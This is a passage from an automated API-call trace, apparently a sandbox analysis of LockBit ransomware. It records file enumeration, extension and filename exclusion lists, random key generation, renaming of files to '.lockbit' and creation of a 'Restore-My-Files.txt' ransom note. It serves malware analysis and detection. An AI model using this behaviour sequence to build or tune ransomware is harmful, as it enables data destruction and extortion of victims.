[0153.349] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0237759.WMF") returned 1 [0153.349] lstrcmpiW (lpString1="ntldr", lpString2="J0237759.WMF") returned 1 [0153.349] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0237759.WMF") returned 1 [0153.349] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0237759.WMF") returned -1 [0153.349] lstrcmpiW (lpString1="autorun.inf", lpString2="J0237759.WMF") returned -1 [0153.349] lstrcmpiW (lpString1="thumbs.db", lpString2="J0237759.WMF") returned 1 [0153.349] lstrcmpiW (lpString1="iconcache.db", lpString2="J0237759.WMF") returned -1 [0153.349] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.349] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237759.WMF") returned=".WMF" [0153.349] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.349] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.349] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.350] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.350] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237759.WMF.lockbit") returned 72 [0153.351] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237759.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0237759.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.352] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.352] malloc (_Size=0x40068) returned 0x3df0008 [0153.352] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=20926) returned 1 [0153.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.352] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.352] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.353] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.358] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237759.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237759.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.358] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.358] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.360] free (_Block=0x1fa2ed8) [0153.360] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0237759.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.360] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.360] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.360] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565f5550, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x59a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0238333.WMF", cAlternateFileName="")) returned 1 [0153.360] lstrcmpiW (lpString1=".", lpString2="J0238333.WMF") returned -1 [0153.360] lstrcmpiW (lpString1="..", lpString2="J0238333.WMF") returned -1 [0153.360] PathFindExtensionW (pszPath="J0238333.WMF") returned=".WMF" [0153.360] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.360] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.360] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.360] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.360] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.360] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.360] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.360] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.361] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.361] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0238333.WMF") returned 1 [0153.362] lstrcmpiW (lpString1="ntldr", lpString2="J0238333.WMF") returned 1 [0153.362] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0238333.WMF") returned 1 [0153.362] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0238333.WMF") returned -1 [0153.362] lstrcmpiW (lpString1="autorun.inf", lpString2="J0238333.WMF") returned -1 [0153.362] lstrcmpiW (lpString1="thumbs.db", lpString2="J0238333.WMF") returned 1 [0153.362] lstrcmpiW (lpString1="iconcache.db", lpString2="J0238333.WMF") returned -1 [0153.362] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.362] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238333.WMF") returned=".WMF" [0153.362] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.362] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.363] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.363] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.364] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238333.WMF.lockbit") returned 72 [0153.364] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238333.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238333.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.365] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.365] malloc (_Size=0x40068) returned 0x3df0008 [0153.365] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=22944) returned 1 [0153.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.365] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.366] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.366] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.366] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.371] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238333.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238333.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.371] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.371] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0153.373] free (_Block=0x1fa2ed8) [0153.373] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238333.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.373] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0153.373] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0153.373] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x660ca390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1334, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0238927.WMF", cAlternateFileName="")) returned 1 [0153.373] lstrcmpiW (lpString1=".", lpString2="J0238927.WMF") returned -1 [0153.373] lstrcmpiW (lpString1="..", lpString2="J0238927.WMF") returned -1 [0153.373] PathFindExtensionW (pszPath="J0238927.WMF") returned=".WMF" [0153.373] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0153.374] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0153.375] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0153.375] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0238927.WMF") returned 1 [0153.375] lstrcmpiW (lpString1="ntldr", lpString2="J0238927.WMF") returned 1 [0153.375] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0238927.WMF") returned 1 [0153.375] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0238927.WMF") returned -1 [0153.375] lstrcmpiW (lpString1="autorun.inf", lpString2="J0238927.WMF") returned -1 [0153.375] lstrcmpiW (lpString1="thumbs.db", lpString2="J0238927.WMF") returned 1 [0153.375] lstrcmpiW (lpString1="iconcache.db", lpString2="J0238927.WMF") returned -1 [0153.376] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0153.376] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238927.WMF") returned=".WMF" [0153.376] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0153.376] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0153.376] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0153.377] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0153.377] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0153.377] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0153.377] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0153.377] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0153.377] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0153.377] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238927.WMF.lockbit") returned 72 [0153.377] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238927.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0238927.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0153.378] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0153.378] malloc (_Size=0x40068) returned 0x3df0008 [0153.378] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4916) returned 1 [0153.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0153.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0153.379] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.384] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238927.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238927.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0153.384] malloc (_Size=0xa6) returned 0x1fa2ed8 [0153.384] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0153.386] free (_Block=0x1fa2ed8) [0153.386] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0238927.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0153.386] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program 